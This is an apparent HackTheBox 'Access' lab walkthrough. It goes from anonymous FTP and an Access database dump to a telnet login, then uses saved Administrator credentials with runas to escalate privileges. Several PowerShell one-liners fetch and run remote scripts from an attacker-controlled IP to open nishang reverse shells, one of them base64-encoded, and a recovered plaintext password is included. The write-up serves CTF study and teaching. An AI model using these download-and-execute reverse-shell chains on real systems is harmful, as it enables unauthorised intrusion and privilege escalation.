# HackTheBox - Access ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3iU2D7bhkud_zX8Eu%2Fimage.png?alt=media\&token=87404e13-e1b0-4c94-80f3-853595fc8c2b) ### Nmap scan results (Basic and all port) ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3ik6G6N40rw41qaF4%2Fimage.png?alt=media\&token=fe8e5eea-0c98-4ba6-befe-05d2068bd9a1) ``` nmap -sC -sV -oA nmap-access 10.10.10.98 ``` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3jcRaHU82aA2JfpVl%2Fimage.png?alt=media\&token=f53e5b38-a063-4cd4-826b-aec166fca044) ### FTP Enumeration FTP Anonymous access allowed, so we can get all the files present in that share. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3koKJbXxz6eTMWadH%2Fimage.png?alt=media\&token=8ecda81c-daa3-47b7-a7b5-62ace6a3ca19) We have `AccessControl.zip` and `backup.mdb` file from the FTP Server. > A file with the **MDB** file extension is a Microsoft Access Database file that literally stands for Microsoft Database. ... **MDB** files contain database queries, tables, and more that can be used to link to and store data from other files, like XML and HTML, and applications, like Excel and SharePoint. ### Exploring mdbtools ``` apt-get install mdbtools wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 # Downloading all the files ``` This command will download all the necessary tools required for analyzing the backup.mdb file. We can list all the tables using mdb-tables or mdb-sql command. Using mdb-tables: ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3pyXltmMTaoI9BfLf%2Fimage.png?alt=media\&token=a64d04e1-7f5f-4e00-9b12-199d2ca31560) Using mdb-sql: ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3q743ICITBbF0l0se%2Fimage.png?alt=media\&token=277aadc8-ef60-49d5-908c-d8a13ce225c9) To extract the information from the tables, we can use mdb-json. ``` for i in $(mdb-tables backup.mdb);do mdb-json backup.mdb $i;done ``` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3qLocpDh0oI287_pK%2Fimage.png?alt=media\&token=9a1df1fa-d6dc-45ff-b177-9b4b6f6bc74b) The password for zip file is stored inside this backup.mdb file and we can search for it. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3qkkJaP0K0q9qEu05%2Fimage.png?alt=media\&token=d6c2e743-c318-455f-8eb0-a661458d9f2c) ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3rXhrfL1O8m25LYiE%2Fimage.png?alt=media\&token=341f543a-f035-4437-8b40-1aaf8f97fa2f) ### Analyzing .pst file using readpst We can convert .pst file into .mbox which can be human readable using `readpst` command. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3y2EJ9J25MEerioGm%2Fimage.png?alt=media\&token=37cc8811-67b9-4f83-8b74-d7c1638e0be3) ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3yVUwN38pX28U7xyt%2Fimage.png?alt=media\&token=0dbd9203-7136-4b5c-b157-39b79acdb172) ### Using Telnet to get shell access Password for the security account is changed to `4Cc3ssC0ntr0ller` We can use telnet to get a shell access as security user. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3z8XSGx8rfv8CZtsL%2Fimage.png?alt=media\&token=80dca280-fe46-45ad-a7ef-0022ed1e8e27) This shell is not really stable and we need to get stable shell for further enumeration. So we will be using nishang Shells from [github](https://github.com/samratashok/nishang/tree/master/Shells). ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY3zopyAAIXs1jKZSLB%2Fimage.png?alt=media\&token=7a373da8-ea8e-40a7-a17e-081e35dc8183) ``` powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell.ps1')" ``` Make sure to add this line at the end of script to run as soon as it gets downloaded on the target computer. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY4-knmwY190aEB4y_H%2Fimage.png?alt=media\&token=6f7ce066-67b2-4b15-bdf9-f72654ca1a84) ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY4-oxSR37QGglkLKaQ%2Fimage.png?alt=media\&token=fcce4a96-0742-4449-800e-ab789d12a3cd) ### Running JAWS script for system enumeration ``` IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/jaws-enum.ps1') ``` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY43Xtl-JpMaL7U65m-%2Fimage.png?alt=media\&token=e1ea695e-ab8c-4367-8886-0d317c65648b) ![Keep this in mind: cmdkey /list ](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY43xx0UEkRqmKrc5EV%2Fimage.png?alt=media\&token=090fe448-1753-4b90-b9bb-c8795548cdb4) We find a very interesting file present under `C:\Users\Public\Desktop` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY44cEOdDHGeMKBm7Rg%2Fimage.png?alt=media\&token=d8b19a61-6fde-4534-9894-b645fac89cec) ### Privilege Escalation We can view the raw contents of the file using `get-Content` command in powershell or we can view it the other way. ``` $WScript = New-Object -ComObject Wscript.Shell $shortcut = Get-ChildItem *.lnk $WScript.CreateShortcut($shortcut) ``` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY45ELs49VbxlAEANgp%2Fimage.png?alt=media\&token=de4b7e08-67f4-479d-b19e-d3786ece56e1) We can run this command as Administrator, so we will try to get a reverse shell using this. ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY47dNxhrqiUHcgQZWt%2Fimage.png?alt=media\&token=0f2288f4-0344-42a1-a368-48d83881f473) We changed the port to 9002 since we already have a connection to port 9001. So now we need to use base64 encoded string to run certain windows commands. ``` echo "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/shell2.ps1')" | iconv --to-code UTF-16LE | base64 -w 0 ``` Windows uses UTF-16 Little Endian and we can convert it using iconv. Also after that we can use base64. w flag specifies `wrap encoded lines after COLS character` ``` runas /user:ACCESS\Administrator /savecred "Powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADIAOgA4ADAAMAAwAC8AcwBoAGUAbABsADIALgBwAHMAMQAnACkACgA=" ``` ![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MY3iMW1HTVkezW_VMi8%2F-MY49WxW9jf6jAgF-vge%2Fimage.png?alt=media\&token=f381b51c-05db-4d05-aa4f-d36321f30d6f) {% hint style="info" %} Note: If we want to access or read all the recently cracked hashes, then we can use the following command. `cat ~/.john/john.pot` {% endhint %}